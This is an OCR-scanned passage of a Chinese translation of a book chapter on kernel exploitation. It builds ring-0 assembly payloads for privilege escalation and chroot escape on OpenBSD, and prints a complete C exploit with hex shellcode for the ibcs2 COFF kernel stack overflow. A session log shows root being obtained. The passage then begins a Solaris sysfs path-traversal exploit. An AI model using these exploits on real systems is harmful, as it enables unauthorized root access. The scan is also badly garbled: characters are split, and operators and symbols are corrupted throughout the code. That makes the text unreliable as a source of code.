在 由 kern_sysct1() 函数 处 理 的 内 核 sysct1 上 。 


注解 见 sys/ kern/kern sysctl .c: 第 234 行 。 

kern_sysct1 () 函数 也 为 某 些 查 询 (例如 进程 结构 、 时 钟 速率 、 虚 拟 节 点 和 文件 信息 〉 指 派 
不 同 的 处 理 程序 。sysctl_qdoproc () 函数 将 处 理 进程 结构 ， 而 这 是 我 们 正在 寻找 的 、 到 内 核 区 信 
息 的 接口 。 

int 


sysctl_doproc (name, namelen, where, sizep) 
int *name; 





u_int namelen; 
char *where; 
size_t *sizep; 


[1] for (; p != 0; p = LIST NEXT(p, p_list)) { 


[2] switch (name[0]) ( 


case KERN PROC PID: 
/* could do this with just a lookup */ 
[3] if (p-»p pid !- (pid t)name[1]) 
continue; 
break; 
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if (buflen »- sizeof(struct kinfo proc)) ( 
[4] fill eproc(p, &eproc); 
[5] error = copyout((caddr t)p, &dp-»-kp proc, 


sizeof(struct proc)); 


void 

fill eproc(p, ep) 
register struct proc *p; 
register struct eproc *ep; 


register struct tty *tp; 


[6] ep->e_paddr = p; 

同样 Xt sysctl_doproc() Ki, AT VFA switch iH fy [2] 处 理 不 同类 型 的 查询 。 
KERN_PROC_PID 对 于 从 任何 进程 的 进程 结构 中 搜集 需要 的 地 址 来 说 是 足够 了 。 对 select () 溢出 
来 说 ， 得 到 父 进程 的 进程 地 址 就 足够 了 。setitimer() 漏洞 用 许多 不 同 的 方法 〈 后 面 会 讨论 ) 利 
用 sysctl() 接 口 。 

sysct1_doproc() 代码 为 了 寻找 查询 的 piaf3]， 遍 历 进程 结构 [1] 的 链表 Clinked list)。 如 
果 发 现 了 , 就 会 用 它们 填充 [4] 和 [5] 的 某 些 结构 (eproc 和 kp_proc), 并 随后 copyout 到 用 户 区 。 
fill eproc() (在 [4] 处 被 调用 ) 达到 目的 后 ， 把 查询 的 pid 的 proc 地 址 复制 到 eproc 结 构 [6] 
的 e_padqdr 成 员 。 最 后 ， 进程 地 址 将 被 复制 到 kinfo_proc 结 构 ( 对 sysct1_doproc O 函数 来 说 ， 
这 个 是 最 主要 的 数据 结构 ) 里 的 用 户 区 。 关 于 这 些 结构 成 员 的 更 多 信息 请 查看 sys/sys/ 
Sysctl.h. 

下 面 是 我 们 用 于 找 回 kinfo_proc 结 构 的 函数 。 

Set procipid t pid, struct kinfo proc *kp) 

{ 


u int arr[4], len; 


arr[0] - CTL KERN; 
arr[1] - KERN PROC; 
arr[2] - KERN, PROC PID; 


arr[3] = pid; 
len = sizeof(struct kinfo proc); 
if(sysctl(arr, 4, kp, &len, NULL, 0) « 0) ( 
perror("sysctl"); 
exit(-1); 
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sys_sysct1 () 将 把 CTI，KERN 分 派 给 kern_sysct1l ()。kern_sysct1 () 将 把 KERN_PROC 分 派 
给 sysct1_doproc () 。 土 述 的 switch 语 名 将 处 理 KERN_PROC_PTD， 最 后 返回 kinfo_proc 结 构 。 


26.14 ”开发 内 核 模式 载荷 

在 这 一 小 节 ， 为 了 提升 权限 、 冲 出 改变 根 目录 的 子 系统 ， 我 们 将 开发 各 种 小 的 、 最 后 将 修改 
它 的 父 进程 进程 结构 的 某 些 字段 的 载荷 。 然 后 ， 我 们 将 用 使 我 们 返回 用 户 区 的 代码 把 开发 的 汇编 
代码 连 起 来 ， 从 而 获取 没有 限制 的 新 特权 。 

1. p_cred#iu_cred 

先 介绍 载荷 提升 权限 。 下 列 所 述 的 代码 是 更 改 任何 选 定 的 进程 结构 的 ucred 用户 的 和 凭证》 
和 pcred《〈 进 程 的 凭证 ) 的 汇编 代码 。 利 用 sysct1 () 系统 调用 (前 文 已 经 讨论 过 ) 填充 它 的 父 进 
程 进程 结构 地 址 的 破解 代码 替换 .1ong 0x12345678。 最 初 的 call 和 pop 指 令 将 把 特定 的 进程 结 
构 地 址 的 地 址 载 入 sedi 。 你 可 以 使 用 众所周知 的 、 几 乎 每 个 shellcode 都 用 过 的 地 址 收集 技术 ， 
Phrack 洒 志 对 此 也 有 介绍 Cwrww.phrack.org/archives/49/P49-14). 


call moo 

.long 0x12345678 <-- pproc addr 
.long Oxdeadcafe 

.long Oxbeefdead 


nop 
nop 

nop 

moo: 

pop %edi 

mov (%edi),%ecx # parent's proc addr in ecx 


# update p_ruid 
mov Oxi0(%ecx),%ebx # ebx = p->p_cred 
xor %eax, teax # eax = 0 


mov %eax, 0x4 (%ebx) # p->p_cred->p_ruid = 0 
# update cr_uid 
mov (%ebx}, %edx # edx = p->p_cred->pc_ucred 
mov %eax, 0x4 (%edx) # p-»L cred-»pc ucred-»cr uid = 0 


2. 冲 出 改变 根 目录 的 子 系统 

接 下 来 ， 我 们 的 ring 0 载荷 将 用 一 小 段 汇编 代码 冲 出 改变 根 目 录 的 子 系 统 。 暂 时 不 必 探 究 
复杂 的 细节 ， 先 大 概 看 一 下 根 目 录 改 变 怎样 检查 每 个 进程 的 基线 Cper-process basis)。 通 过 用 想 
要 jail 目 录 的 vnode 指 针 填 充 Eiledesc〔 打 开 文 件 结构 ) 的 fq_rair filedesc 成 员 来 实现 改变 根 
目录 的 子 系统 。 当 内 核 为 某 些 请 求 服务 特定 的 进程 时 , 它 会 检查 是 否 用 具体 的 虚拟 指针 填充 这 个 
指针 。 

如 果 发 现 虚拟 指针 ， 具 体 的 进程 会 被 相应 地 处 理 。 内 核 会 想 着 为 这 个 进程 创建 新 的 根 目录 ， 
从 而 把 它 因 禁 在 预定 义 的 目录 里 。 对 不 改变 根 目 录 的 进程 来 说 ， 这 个 指针 为 零 / 未 设置 。 不 用 探 
究 更 多 的 实现 细节 ， 把 指针 设 为 空 字 节 ， 攻 击 根 目录 改变 。 通 过 如 下 的 进程 结构 引用 fq_rdir。 


p->p_fd->fd_rdir 
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如 同 凭证 结构 一 样 ， 我 们 的 载荷 仅 增加 两 条 指令 就 可 以 直接 访问 并 更 改 filedesc。 


# update p->p_fd->fd_rdir to break chroot() 


mov 0x14 (%ecx) , $edx # edx = p->p_fd 
mov %eax, Oxc (%edx) # p->p_fd->fd_rdir = 0 


26.1.5 ”从 内 核 载荷 返回 

在 我 们 更 改进 程 结构 的 某 些 字段 、 提 升 权 限 并 从 改变 根 目录 的 子 系统 逃脱 之 后 , 我 们 还 需要 
恢复 系统 的 正常 操作 。 总 的 来 说 ， 我 们 必须 回 到 用 户 模式 〈 意 味 着 进程 要 执行 系统 调用 )， 或 返 
回 内核 模 式 。 通 过 iret 指 令 回 到 用 户 模 式 是 简单 明了 的 ， 但 有 时 候 系统 并 不 允许 我 们 这 样 做 ， 因 
为 内 核 可 能 锁定 了 某 些 同步 对 象 ， 例 如 mutex 锁 和 rdwr 锁 。 在 这 样 的 情况 下 ， 你 需要 回 到 将 解锁 
这 些 同步 对 象 的 内 核 代码 的 地 方 ， 这 样 才 不 会 使 内 核 朋 溃 。 有 些 黑客 对 返回 内 核 模 式 有 一 些 错 误 
的 判断 ， 我 们 建议 他 们 用 这 个 方法 浏览 更 多 脆弱 的 内 核 代码 ， 并 斌 着 利用 代码 。 实 际 上 ， 对 于 恢 
复 系统 流程 来 说 , 返回 同步 对 象 被 解锁 的 内 核 模 式 是 最 好 的 解决 办 法 。 如 果 我 们 不 具备 这 样 的 条 
件 ， 就 只 能 用 iret 技 术 了 。 

1. 返回 到 用 户 模式 : iret 技 术 

下 面 的 代码 是 ISR (Interrupt Service Routine， 中 断 服务 例 程 ) 调用 的 系统 调用 处 理 程序 。 这 
个 函数 调用 高 层 〈 用 C 写 成 的 ) 系统 调用 处 理 程序 [1] ， 在 真正 的 系统 调用 返回 后 ， 设 置 寄存 器 


并 回 到 用 户 模式 [2] 。 
IDTVEC (syscall) 
pushl $2 # size of instruction for restart 
Syscalll: 
pushl $T ASTFLT # trap # for doing ASTs 
INTRENTRY 
movil C. LABEL (cpl),$ebx 
movil TF EAX(S*$esp),$esi * syscall no 
[1] cali .C LABEL(syscall) 
2: /* Check for ASTs on exit to user mode. */ 
cli 
cmpb $0, C. LABEL(astpending) 
je 1f 
/* Always returning to user mode here. */ 
movb $0, C LABEL(astpending) 
sti ' 
/* Pushed T ASTFLT into tf trapno on entry. */ 
call _C_LABEL (trap) 
jmp 2b 
1: empl _C_LABEL (cpl), %ebx 
jne 3f 
[2] INTRFASTEXIT 


#define INTRFASTEXIT \ 
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popl ges PON 
popl tds PN 

popl sedi PON 

popl $esi 7 \ 

popl %ebp PM 

popl %ebx PN 

popl Sedx 7 \ 

popl %ecx PON 

popl %eax PN 

addl $8, %esp PN 

iret 

我 们 将 基于 前 面 初始 的 、 已 宣告 的 系统 调用 处 理 程 序 执行 如 下 的 例 程 , 模仿 从 中 断 操 作 返 回 。 


cli 


# set up various selectors for user-land 
# es = ds = Oxlf 
pushl $0x1f 


popl %es 
pushl $0x1f 
popl sds 


# esi = esi = 0x00 
pushl $0x00 


popl tedi 
pushl $0x00 
popl %esi 


# ebp = Oxdfbfd000 
pushl $0xdfbfd000 
popl %ebp 


# ebx = edx = ecx = eax = 0x00 
pushl $0x00 
popl %ebx 
pushl $0x00 
popl %edx 
pushi $0x00 
popl %ecx 
pushi $0x00 
popl %eax 


pushl $0x1f # ss = Oxlf 

pushl $0xdfbfd000 # esp = Oxdfbfd000 

pushl $0x287 # eflags 

pushi $0x17 # cs user-land code segment selector 


# set set user mode instruction pointer in exploit code 
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pushl $0x00000000 # empty slot for ring3 %eip 

iret 

2. 返回 到 内 核 代 码 ，siat 技 术 和 _kernel_text 搜 索 

返回 用 户 模式 的 技术 依靠 [DTR (Interrupt Descriptor Table Register， 中 断 描 述 符 表 寄存 器 )。 
它 包 含 IDT (Interrupt Descriptor Table， 中 断 描 述 符 表 ) 的 开始 地 址 。 

IDT 并 不 探究 多 余 的 细节 ， 而 是 为 各 种 中 断 向 量 保存 中 断 处 理 程序 。 从 0 到 2S5 的 每 个 数字 都 
代表 x86 里 的 一 个 中 汤 , 这 些 数 字 被 称 为 中 断 向 量 。 这 些 向 量 被 用 来 为 在 IDT 之 内 特定 的 中 断定 位 
原始 的 处 理 程序 。IDT 包 括 256 个 入 口 ， 每 个 8B。 有 3 种 不 同类 型 的 IDT 描 述 符 入口 ， 但 我 们 将 只 
介绍 system gate 描 述 符 。trap gate 描 述 符 被 用 来 设置 原始 的 系统 调用 处 理 程序 (在 前 面 的 章节 里 曾 
讨论 过 )。 





注解 OpenBSD 使 用 相同 的 gate_descriptor 结 构 作 为 trap 和 system 描述 符 。 同 样 ，system gate 在 
代码 里 将 被 作为 trap gate 引 用 。 


sys/arch/i386/machdep.c line 2265 


setgate(&idt[128], &IDTVEC (syscall), 0, SDT SYS386TGT, SEL UPL, 
GCODE SEL); 


sys/arch/i386/include/segment.h line 99 


struct gate descriptor { 


unsigned gd looffset:16; /* gate offset (lsb) */ 
unsigned gd selector:16; /* gate segment selector */ 
unsigned gd stkcpy:5; /* number of stack wds to cpy */ 
unsigned gd xx:3; /* unused */ 
unsigned gd type:5; /* segment type */ 
unsigned gd dpl:2; /* segment descriptor priority level */ 
unsigned gd p:1; /* segment descriptor present */ 
unsigned gd hioffset:16; /* gate offset (msb) */ 

} 

[delete] 

line 240 

#define SDT_SYS386TGT 15 /* system 386 trap gate */ 


gate_descriptor 还 包括 gd_looffset 和 gd_hioffset， 它 们 将 生成 低层 (low-level) Fit 
处 理 程 序 的 地 址 。 若 想 了 解 这 些 字 段 的 更 多 信息 ， 可 以 查阅 架构 手册 www.intel.comydesign/ 
Pentium4/documentation.htm. 

请 求 内 核 服 务 的 系统 调用 接口 通过 软件 初始 中 断 0x80 来 实现 。 有 了 这 些 信息 ， 就 可 以 从 低层 
(low-level) 系统 调用 中 断 处 理 程序 开始 遍历 内 核 文 本 。 现 在 ， 你 可 以 找到 使 用 高 层 Chigh-leveD 
系统 调用 处 理 程序 的 方法 ， 并 最 终 选 择 该 方法 。 
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OpenBSD 里 的 IDT 被 命名 为 _idt_region，0x80 是 系统 调用 中 汤 的 system gate 描述 符 。 因 为 
IDT 的 每 个 成 员 都 是 8B 长 ， 系 统 调用 gate_descriptor 的 地 址 是 _idt_region+0x80*0x80， 世 


就 是 _idt_region + Ox400。 


bash-2.05b# Stopped at _Debugger+0x4: leave 
ddb> x/x _idt region+0x400 

_idt_region+0x400: 80e4c 

ddb> ^M 

_idt_region+0x404: e010ef00 


为 了 推导 出 原始 的 系统 调用 处 理 程序 ， 我 们 需要 对 system gate 描 述 符 的 位 字段 做 适当 的 
shift 或 or 运算 。 这 就 可 以 获取 0xe100e4c 内 核 地 址 。 


bash-2.05b# Stopped at _Debugger+0x4: leave 
ddb> x/x Oxe0100e4c 

_Xosyscall_end: pushl $0x2 

ddb» ^M 

_Xosyscall_end+0x2: pushl $0x3 


_Xosyscall_end+0x20: call _syscall 


如 同 异常 或 软件 初始 中 断 一 样 ， 在 IDT 里 会 发 现 对 应 的 向 量 。 执 行将 被 重 定向 到 从 某 个 gate 
描述 符 获 悉 的 处 理 程序 。 这 个 处 理 程序 被 认为 是 “中 间 处 理 程序 ” 它 最 终 将 把 我 们 带 到 真正 的 
处 理 程序 。 正 如 在 内 核 调试 器 输出 里 看 到 的 那些 内 容 一 样 ， 原 始 的 处 理 程序 _xosyscall_end 保 
存 所 有 的 寄存 器 (也 有 一 些 其 他 的 低层 操作 符 〉 并 立即 调用 真正 的 处 理 程序 _syscall ()。 

我 们 已 经 注意 到 ，iatz 寄 存 器 总 是 包含 _iat_region 的 地 址 。 现 在 需要 一 个 访问 该 地 址 内 
容 的 方法 。 

sidt 0x4 (%edi) 

mov 0x6 (%edi), %ebx 


_the_iat_region 的 地 址 被 复制 到 ebx, 现在 可 以 通过 epx 引 用 IDT 了 。 从 原始 的 处 理 程序 搜 
集 系 统 调用 处 理 程序 的 汇编 代码 如 下 。 


sidt 0x4 (%edi) 

mov 0x6 (%edi) , %ebx 
mov 0x400(%ebx) , tedx 
mov 0x404 (%ebx) , tecx 


# mov _idt_region is in ebx 
# 
# 
shr $0x10,%ecx # 
# 
# 
# 


_idt_region[0x80 * (2*sizeof long) = 0x400] 
_idt_region[0x404] 

sal $0x10,%ecx ecx = gd_hioffset 

sal $0x10,%edx 

shr $0x10,%edx edx = gd_looffset 

or Secx, tedx # edx = ecx | edx =  Xosyscall end 


目前 ， 我 们 已 经 成 功 发 现 了 原始 /中 间 处 理 程序 的 位 置 。 下 一 步 应 该 是 搜索 整个 内 核 文本 ， 
找 出 call_syscall， 并 搜集 调用 指令 的 位 移 量 ， 把 它 加 到 指令 位 置 的 地 址 。 另 外 ， 为 了 补偿 调 
用 指令 本 身 的 大 小 ， 位 移 量 应 当 再 增加 5B。 
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xor  $ecx,$ecx # zero out the counter 
up: 

inc  $ecx 

movb ($edx,£ecx),$bl # bl = _Xosyscall_end++ 
cmpb $0xe8,2b1 # if bl == Oxe8 : 'call' 
jne up 


lea (%edx, ecx), %ebx # _Xosyscall_end+%ecx: call _syscall 

inc %ecx 

mov (%edx, %ecx),%ecx # take the displacement of the call ins. 

add $0x5,%ecx # add 5 to displacement 

add  $ebx,$ecx # ecx = _Xosyscall_end+0x20 + disp =  syscall() 


现在 ，%ecx 保 存 了 真正 的 处 理 程序 _syscall 的 地 址 。 接 下 来 的 步骤 是 找 出 从 哪儿 返回 到 
syscall () 函数 里 面 ， 这 将 要 求 我 们 对 各 种 版 本 的 、 带 不 同 内 核 编译 选项 的 OpenBSD 进 行 广泛 研 
究 。 幸 运 的 是 ， 我 们 确实 可 以 在 _syscal1 () 里 找到 ca11 *g%eax 指 令 。 这 证 明了 在 每 一 个 测试 的 
OpenBSD 版 本 里 ， 把 每 个 系统 调用 分 派 到 它 最 终 的 处 理 程序 的 指令 是 存在 的 。 

从 OpenBSD 2.6 到 3.3， 内 核 代码 总 是 用 call *%eax 指 令 分 派系 统 调 用 ， 而 它 在 _syscall () 
函数 的 范围 内 是 唯一 的 。 

bash-2.05b# Stopped at _Debugger+0x4: leave 

ddb» x/i _syscall+0x240 i 


_syscall+0x240: call *%eax 
ddb>cont 


我 们 现在 的 目标 是 为 不 同 的 版 本 计算 偏 移 量 〈 在 这 个 例子 里 是 0x240)。 我 们 想 从 载荷 回 到 
紧 跟 cal1 *%eax 之 后 的 指令 ， 继 续 内 核 执 行 。 搜 索 代码 如 下 。 


#search for opcode: ffd0 ie: call *%eax 


mov %ecx, tedi 
mule: 

mov SOxff,%al 
cld 


mov SOxffffffff,*eox 
repnz scas $es:í(€Sedi),$€al 
* ok, start with searching Oxff 


mov (edi), tbl 

cmp $0xd0,%b1 # check if Oxff is followed by 0xd0 
jne mule # if not start over 

inc Sedi # good found! 

xor eax, eax #set up return value 

push Sedi #push address on stack 

ret #jump to found address 


最 后 ， 这 个 载荷 是 我 们 彻底 返回 所 需要 的 全 部 代码 。 不 用 再 修改 了 , 任何 基于 溢出 的 系统 调 ES 
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已 被 破坏 的 保存 的 帧 指针 。 你 可 以 通过 在 脆弱 函数 的 prolog 上 以 及 epilog 里 的 1eave 指 令 之 前 设置 
断 点 ， 算 出 有 意义 的 基 址 指针 。 现 在 ， 计 算 在 prolog 里 记录 的 gsebp 与 返回 调用 者 之 前 记录 的 sesp 
之 间 的 差额 。 下 面 的 指令 将 为 这 个 特殊 的 漏洞 把 sebp 设 回 到 合理 的 值 。 


lea  0x68($esp),€$ebp # fixup ebp 


26.1.6 ”得 到 根 权 限 Cuid=o) 


最 后 ， 我 们 把 前 面 所 有 的 内 容 连 起 来 ， 最 终 将 得 到 把 权限 提升 为 根 权 限 的 、 可 以 冲破 任何 可 
能 的 改变 根 目录 的 子 系统 的 限制 的 破解 代码 。 

-bash-2.05b$ uname -a 

OpenBSD the0.wideopenbsd.net 3.3 GENERIC#44 i386 

-bash-2.05b$ gcc -o theOtherat coff ex.c 

-bash-2.05b$ id 

uid=1000 (noir) gid-1000(noir) groups=1000 (noir) 

-bash-2.05b$ ./theOtherat 


DO NOT FORGET TO SHRED ./ibcs2own 

Abort trap 

-bash-2.05b$ id 

uid=0(root) gid=1000(noir} groups-1000 (noir) 
-bash-2.05b$ bash 

bash-2.05b# cp /dev/zero ./ibcs2own 


/home: write failed, file system is full 

Cp: ./ibcs2own: No space left on device 

bash-2.05b# rm -f ./ibcs2own 

bash-2.05b# head -2 /etc/master.passwd 

root:$2a$08$ [cut] :0:0:daemon:0:0:Charlie &:/root:/bin/csh 
daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin 


/** OpenBSD 2.x - 3.3 
/** exec ibcs2 coff prep zmagic() kernel stack overflow 
/** note: ibcs2 binary compatibility with SCO and ISC is enabled **/ 


/** in the default install **/ 
/** Copyright Feb 26 2003 Sinan "noir" Eren **J 
/** noir@olympos.org | noir@uberhax0r.net **/ 


#include <stdio.h> 
#include <sys/types.h> 
#include <fcntl.h> 
#include <unistd.h> 
#include <sys/param.h> 
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#include «sys/sysctl.h» 
#include «sys/signal.h» 


/* kernel sc.s shellcode */ 


unsigned char shellcode[] = 
"\xe8\x0£\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" 
"\x90\x9O\x90\xK5E\x8b\x0f\x8b\x59\x10\K31\xc0\x89\x43\x04\x8b\x13\x89" 
"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0£E\x01\x4£\x04\x8b" 
"\x5£\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10" 
"\xc1\xel\x10\xc1\xe2\x10\xecl\xea\x10\x09\xca\x31\xc9\x41\x8a\xic\x0a" 
"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" 
"\x89\xcf\xbO\xff\xfc\xb9\xff\xfi\xff\xff£\xf2\xae\x8a\x1f£\x80\xfb\xdo" 
"\x75\xef\x47\x31\xcO\x57\xc3"; 


/* iret sc.s */ 


unsigned char iret shellcode[] - 
“\xe8\x0£\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe" 
"\90\x90\x90\x5f\x8b\x0£\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89" 
"\x42\«x04\x8b\«51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1lf\x1f£\x6a\x00" 
"\x5f\x6a\x00\x5e\x68\x00\xd0\xabf \xdf\x5d\x6a\x00\x5b\x6a\x00\xSa\x6a" 
"\x00\x59\x6a\x00\x58\x6a\xl£\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00" 
"\x6a\x17"; 


unsigned char pusheip[] = 
"\x68\x00\x00\x00\x00"; /* fill eip */ 


unsigned char iret[] = 
"AxcfÍ"; 


unsigned char exitsh[] - 
"\x31\xcO\xcd\x80\xcc"; /* xorl %eax,teax, int $0x80, int3 */ 
#define ZERO(p) memset(&p, 0x00, sizeof (p)) 
/* 
* COFF file header 
*/ 


struct coff filehdr ( 





u short f magic; /* magic number */ 

u short f nscns; /* # of sections */ 

long f timdat; /* timestamp */ 

long f symptr; /* file offset of symbol table */ 
long f nsyms; | 7* # of symbol table entries */ 
u short f opthdr; /* size of optional header */ 


u, Short £ flags; /* flags */ 
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}; 





/* f_magic flags */ 


#define COFF MAGIC 1386 Oxi4c 
/* f flags */ 
#define COFF F RELFLG 0x1 
#define COFF_F_EXEC 0x2 
#define COFF_F_LNNO 0x4 
#define COFF_F_LSYMS 0x8 
#define COFF_F_SWABD 0x40 
#define COFF_F_AR16WR 0x80 
#define COFF_F_AR32WR 0x100 
/* 
* COFF system header 
*/ 
struct coff_aouthdr ( 
short a magic; 
short a vstamp; 
long a tsize; 
long a dsize; 
long a bsize; 
long a entry; 
long a tstart; 
long a_dstart; 
}; 
/* magic */ 
#define COFF_ZMAGIC 0413 
/ * 
* COFF section header 
*/ 
struct coff_scnhdr { 
char s_name[8]; 
long s_paddr; 
long s_vaddr; 
long S size; 
long sS scnptr; 
long s relptr; 
long s lnnoptr; 
u. short s nreloc; 
u_short s_ninno; 


long 


s_flags; 
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/* s_flags */ 


#define COFF_STYP_TEXT 0x20 
#define COFF_STYP_DATA 0x40 
#define COFF STYP SHLIB 0x800 。 


void get_proc(pid_t, struct kinfo_proc *); 
void sig_handler(); 


int 
main(int argc, char **argv) 
{ 
u_int i, fd, debug = 0; 
u_char *ptr, *shptr; 
u_long *lptr; 
u_long pprocadr, offset; 
struct kinfo_proc kp; 
char *args[] = ( "./ibcs2own", NULL}; 
char *envs[] = { "RIP=theo", NULL}; 
//COFF structures 
struct coff_filehdr fhdr; 
struct coff_aouthdr ahdr; 
struct coff scnhdr scn0, sceni, scn2; 


if(argv[1]) { 


if(!strnemp(argv[1], "-v", 2)) 
debug - 1; 
else ( 
printf("-v: verbose flag only\n"); 
exit(0); 
H 
} 
ZERO (fhdr) ; 


fhdr.f_magic = COFF MAGIC 1386; 

fhdr.f nscns - 3; //TEXT, DATA, SHLIB 

fhdr.f timdat = Oxdeadbeef; 

fhdr.f symptr - 0x4000; 

fhdr.f nsyms - 1; 

fhdr.f opthdr - sizeof(ahdr); //AOUT opt header size 
fhdr.f flags = COFF F EXEC; 


ZERO (ahdr); 

ahdr.a magic = COFF_ZMAGIC; 
ahdr.a tsize - 0; 

ahdr.a dsize - 0; 

ahdr.a bsize - 0; 

ahdr.a entry = 0x10000; 
ahdr.a tstart - 0; 
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ahdr.a_dstart = 0; 


ZERO (sen0); 
memcpy (&scn0.s_name, ".text", 5); 
scn0.s paddr = 0x10000; 

scnO0.s vaddr = 0x10000; 

scn0.s size = 4096; 

scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof (sen0)*3); 
//file offset of .text segment 
scen0.s_relptr = 0; 

sen0.s_innoptr = 0; 

scn0.s nreloc = 0; 

scnO0.s nlnno = 0; 

scnO0.s flags = COFF STYP TEXT; 


ZERO(scn1); 
memcpy(&scnl.s name, ".data", 5); 

scni.s paddr = 0x10000 - 4096; 

scnl.s, vaddr = 0x10000 - 4096; 

scnl.s size - 4096; 

Sscnl.s scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) +4096; 
//file offset of .data segment 

scnl.s relptr - 0; 

scni.s lnnoptr = 0; 

scnl.s nreloc = 0; 

scnl.s ninno - 0; 

scnl.s flags - COFF STYP DATA; 


ZERO(scn2); 
memcpy(&scn2.5 name, ".shlib", 6); 

scn2.s paddr = 0; 

scn2.s_vaddr = 0; 

scn2.s_size = 0xb0; //HERE IS DA OVF!!! static buffer = 128 
scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof (scn0)*3) + 2*4096; 
//file offset of .data segment 

scn2.s relptr - 0; 

scn2.s lnnoptr = 0; 

scn2.s nreloc = 0; 

scn2.8 nlnno = 0; 

scn2.sS flags = COFF_STYP_SHLIB; 


offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096; 
ptr - (char *) malloc(offset); 
if(!ptr) ( 

perrorí("malloc"); 

exit(-1); 
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memset(ptr, Oxcc, offset); /* fill int3 */ 


/* copy sections */ 

offset - 0; 

memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); 
offset += sizeof(fhdr]; 


memcpy (ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
offset += sizeof(ahdr); 


memepy(ptr+offset, (char *) &scn0, sizeof(scn0)); 
offset += sizeofíscn0); 


memcpy (ptrt+offset, &seni, sizeof(seni)); 
offset += sizeof(scnl); 


memcpy (ptr+offset, (char *) &scn2, sizeof(scn2)); 
offset += sizeof(scn2); 


lptr = (u long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + ^ 
(sizeof (scn0) * 3) + 4096 + 4096 + OxbO - 8); 


shptr = (char *) malloc(4096); 
if(!shptr) { 
perror("malioc"); 
exit(-1); 
H 
if (debug) 
printf("payload adr: 0x%.8x\t", shptr); 


memset (shptr, Oxcc, 4096); 

get proe((pid t) getppid(), &kp); 
pprocadr - (u long) kp.kp eproc.e paddr; 
if (debug) 


printf("parent proc adr: 0x%.8x\n", pprocadr); 


*lptr++ = Oxdeadbeef; 
*lptr = (u long) shptr; 


shellcode[5] = pprocadr & Oxff; 


shellcode[6] = (pprocadr >> 8) & Oxff; 
shellcode[7] = (pprocadr >> 16) & Oxff; 
shellcode[8] = (pprocadr >> 24) & Oxff; 





memcpy (shptr, shellcode, sizeof (shellcode)-1); 


unlink("./ibes2own") ; 
if((fd = open("./ibcs2own", O CREAT^O RDWR, 0755)) < 0) { 
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perror ("open"); 
exit(-1); 


write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(sen0) * 3) + 4096*3); 
close(fd); 
free(ptr); 


))sig_handler); 
)sig handler); 


signal (SIGSEGV, (void (*) ( 
() 
())sig handler); 
() 
)( 
)( 


signal(SIGILL, (void (*) 
signal(SIGSYS, (void (*) 
Signal(SIGBUS, (void (*) 
Signal(SIGABRT, (void (> 
Signal(SIGTRAP, (void (* 


)sig handler); 
))sig handler); 
))sig handler); 


printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n") ; 
execve(args[0], args, envs); 
perror("execve"); 


void 
Sig handler() 
{ 
exit (0); 
} 
void 
get_proc(pid_t pid, struct kinfo proc *kp) 
{ 


u int arr[4], len; 


arr[0] - CTL, KERN; 
arr{1] = KERN PROC; 
arr[2] = KERN PROC. PID; 


arr[3] = pid; 
len = sizeof(struct kinfo proc); 
if(sysctl(arr, 4, kp, &len, NULL, 0) « 0) { 
perrorí("sysctl"); 
fprintf(stderr, "this is an unexpected error, rerun!\n"); 


exit(-1); 


} 


26.2 Solaris vfs_getvfssw() 可 加 载 内 核 模块 路 径 遍 历 破解 


这 部 分 比较 简短 ， 因 为 相对 于 前 面 的 OpenBSD 破解 来 说 ， 建 立 可 靠 的 vfs_getvfssw() 破 解 
只 需 较 少 的 步骤 。 和 OpenBSD 漏 洞 不 同 的 是 ，Solaris 的 vfs_getvfssw() 漏 洞 很 容易 破解 。 我 们 
只 需 写 一 个 用 复杂 的 modname 参 数 调用 某 一 脆弱 的 系统 调用 的 破解 代码 即 可 。 另 外 ， 我 们 需要 一 
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个 内 核 模块 ， 它 将 在 进程 描述 符 的 链表 中 定位 进程 ， 并 把 进程 的 凭证 改 为 根 用 户 所 有 。 编 写 这 样 
的 恶意 内 核 模块 可 能 需要 有 开发 内 核 模式 的 经 验 ， 这 不 属于 本 书 所 讨论 的 范围 。 我 们 建议 你 阅读 
由 Jim Mauro 和 Richard McDougall 编 写 的 Solaris Internals, 那 是 迄今 为 止 最 全 面 的 介绍 Solaris 内 核 
的 书 ， 仔 细 阅 读 之 后 ， 你 就 会 熟悉 Solaris 的 内 核 体系 架构 。 

对 vfs_getvfss () 漏洞 来 说 ， 可 用 的 载荷 有 许多 ， 但 我 们 只 介绍 用 来 获取 根 shell 的 例子 。 你 
可 以 很 容易 地 把 这 个 技术 发 扬 光大 , 针对 可 信 目 标 操作 系统 、 主机 入 侵 预 防 系 统 和 其 他 安全 设备 
开发 出 更 有 意思 的 破解 代码 。 


26.2.1 精心 编写 破解 代码 


下 面 的 代码 将 用 ../../. ./tmp/o0 参 数 调 用 sysfs () 系统 调用 。 这 将 欺骗 内 核 ， 使 它 加 载 
/tmp/sparcv9/o0《〈 如 果 工 作 在 64 位 内 核 下 ) 或 /tmp/o0 《如 果 它 是 32 位 内 核 )。 这 是 我 们 将 放 
在 /tmp 文 件 夹 下 的 模块 。 


#include <stdio.h> 

#include <sys/fstyp.h> 
#include <sys/fsid.h> 
#include <sys/systeminfo.h> 


/*int sysfs(int opcode, const char *fsname); */ 


int 
main(int arge, char **argv) 
{ 
char modname[] = "../../../tmp/o0"; 
char buf[4096]; 
char ver[32], *ptr; 
int sixtyfour - 0; 


